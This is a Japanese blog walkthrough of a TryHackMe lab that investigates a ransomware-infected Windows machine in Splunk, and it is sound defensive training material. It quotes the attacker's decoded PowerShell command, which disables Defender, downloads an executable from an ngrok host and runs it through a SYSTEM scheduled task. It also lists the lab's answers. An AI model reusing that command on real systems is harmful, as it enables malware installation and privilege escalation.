こんにちは、ぎんたです。
今回は、Splunkを使ったランサムウェアの感染端末の調査を体験できる「PS Eclipse」というルームの攻略の過程を記事にしています。
- Splunkを使った端末の調査に興味のある方
- ランサムウェアの感染端末の調査に関心がある方
が今回の対象です。
Splunkは調査でよく使うツールの一つだから、Splunkを使った解析について知っておくといいと思うよ。
このルームも無料でアクセス可能なので、試してみたい方はぜひやってみてください。
スポンサーリンク
シナリオの概要
日本語に訳したシナリオの概要は以下のとおりです。
顧客から、2022年5月16日月曜日にキーガンのマシンで発生した事象を調査するようアナリストに依頼する電子メールが届いた。
顧客は、マシンの操作はできるが一部のファイルの拡張子が変だと指摘。
顧客は、Keeganのデバイスでランサムウェアの試みがあったことを心配している。
あなたの上司は、Splunk でイベントをチェックし、Keegan のデバイスで何が発生したかを特定するよう命じました。
Splunkを使ったランサムウェアの感染端末の調査
疑わしいバイナリがエンドポイントにダウンロードされました。バイナリの名前は何ですか?
追加のバイナリをダウンロードする手法としてPowerShellを用いた方法が良く使われるので、まずはpowershellでSearchしました。
実行したところ、以下の画像のような不審な引数をつけてPowerShellが実行されていました。
powershell
探索する期間を全期間にするために「All time」に指定しておきました。
引数にBase64でエンコードされた文字列を設定しているのが分かります。
画像では切れてしまって見えませんが、Sysmonで記録されていたようです。
- ソース: WinEventLog:Microsoft-Windows-Sysmon/Operational
- イベントコード: 1(Process Creation)
次にCyberChefのサイトで以下のように設定すると、デコードしたコマンドを確認することができます。
Recipe:
「From Base64」でデコードをする。
「Decode text」でUTF-16LE(1200)を指定し、適切な形式にテキストをデコードする。
Output:
Set-MpPreference -DisableRealtimeMonitoring $true;wget http://886e-181-215-214-32.ngrok.io/OUTSTANDING_GUTTER.exe -OutFile C:\Windows\Temp\OUTSTANDING_GUTTER.exe;SCHTASKS /Create /TN “OUTSTANDING_GUTTER.exe” /TR “C:\Windows\Temp\COUTSTANDING_GUTTER.exe” /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU “SYSTEM” /f;SCHTASKS /Run /TN “OUTSTANDING_GUTTER.exe”
wgetで不審サイトにアクセスし、ファイルをダウンロードしている痕跡を確認できます。
答え:OUTSTANDING_GUTTER.exe
バイナリをダウンロードしたアドレスは何ですか?
先ほどの画像で確認できます。
答え:hxxp[://]886e-181-215-214-32[.]ngrok[.]io
不審なバイナリのダウンロードに使用されたWindowsの実行ファイルは何ですか?
PowerShellを使ったことが分かっているので、パス付で解答すると正解になります。
答え:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
不審なバイナリを昇格特権で実行するように設定するために実行されたコマンドは何ですか?
デコードされたPowerShellの引数を確認します。
以下の箇所に注目します。
SCHTASKS /Create /TN “OUTSTANDING_GUTTER.exe” /TR “C:\Windows\Temp\COUTSTANDING_GUTTER.exe” /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU “SYSTEM” /f
タスクスケジューラの作成をしています。
また、/RUでSYSTEMと設定されています。
ダウンロード後に昇格された特権で実行するため、タスクスケジューラにSYSTEMユーザで実行するように設定していることが分かりました。
タスクスケジューラを使った権限昇格の方法となります。
答え:”C:\Windows\system32\schtasks.exe” /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f
不審なバイナリはどのような権限で実行されるのか?昇格した権限でバイナリを実行するコマンドは何ですか?
こちらもPowerShellのデコードした引数に記載されています。
SCHTASKS /Run /TN “OUTSTANDING_GUTTER.exe”
答え:NT AUTHORITY\SYSTEM;”C:\Windows\system32\schtasks.exe” /Run /TN OUTSTANDING_GUTTER.exe
不審なバイナリがリモートサーバーに接続した。どのアドレスに接続しましたか?
発見したバイナリファイル(OUTSTANDING_GUTTER.exe)でSearchしたところ以下の結果が得られました。
OUTSTANDING_GUTTER.exe
QueryNameでフィルタしたところ、通信先を1つ確認しました。
不審なバイナリが上記画像の通信先の名前解決要求をしているため、解答したところ正解でした。
答え:hxxp[://]9030-181-215-214-32[.]ngrok[.]io
PowerShellスクリプトが不審なバイナリと同じ場所にダウンロードされました。ファイル名は何でしたか?
PowerShellのスクリプトの拡張子は「.ps1」です。
不審なバイナリがダウンロードされた場所は「C:\Windows\Temp」以下と判明していますので、以下のようにSearchしました。
.ps1
| dedup TargetFilename
| table TargetFilename
「C:\Windows\Temp」以下にいくつか該当するスクリプトはありましたが、いかにも怪しいファイル名があったので、こちらを解答したら正解でした。
答え:script.ps1
悪意のあるスクリプトとしてフラグが立てられました。悪意のあるスクリプトの実際の名前は何だと思いますか?
VirusTotalでscript.ps1の実際の名前を確認できるかもしれません。
script.ps1でSearchしたところ、SHA1ハッシュを発見しました。
script.ps1
ソース: WinEventLog:Microsoft-Windows-Sysmon/Operational
イベントコード: 23(File Delate)
SHA1ハッシュをコピーし、VirusTotalで調査すると該当のファイルは34件検知されました。
Ransomという判定を出しているベンダーもいくつかありますね。
DETAILSタブを開いて確認したところ、実際のファイル名が判明しました。
答え:BlackSun.ps1
ランサムウェアのメモがディスクに保存されました。身代金要求メモが保存された完全なパスは何ですか?
ランサムノートの拡張子は「.txt」が多い印象なので、以下のようにSearchしました。
.txt
ソース: WinEventLog:Microsoft-Windows-Sysmon/Operational
イベントコード: 11(File Created)
該当するファイルは3つありましたが、一番上の不審な名前のテキストファイルを解答したら正解でした。
答え:C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt
スクリプトは、ユーザのデスクトップの壁紙を置き換えるために、IOCとしても機能する画像ファイルをディスクに保存しました。画像のフル・パスは?
画面の壁紙は「.png」「.jpg」あたりかなと推測しました。
とりあえず、「.jpg」でSearchします。
.jpg
ソース: WinEventLog:Microsoft-Windows-Sysmon/Operational
イベントコード: 11(File Created)
該当するファイルは2件でした。
Imageがpowershell.exeとなっており、Sysmonでファイルを作成した動作を記録しているので、下のファイルを解答したら正解でした。
答え:C:\Users\Public\Pictures\blacksun.jpg
スポンサーリンク
まとめ
今回は、TryHackMeで提供されている「PS Eclipse」というルームの攻略の過程を解説しました。
ログ分析を効率的に行うことができるツールとして、Splunkでの調査は有用なので何度か使ってみて覚えておくといいと思うよ。
この記事が少しでも役に立てれば幸いです。
以上、ぎんたでした。
サイバーセキュリティを学ぶ上で必要な攻撃と解析に関する他の記事は、以下のリンクで確認できます。
学習に関しましては、以下のセキュリティの勉強法、おすすめの学習本・動画の記事が多くの方に読まれています。
資格の記事については以下の記事がおすすめです。
ITエンジニアへの転職については以下の記事がおすすめです。
その他学習・転職関連に関しましては、以下の記事もあわせて読まれています。
ぜひご覧ください!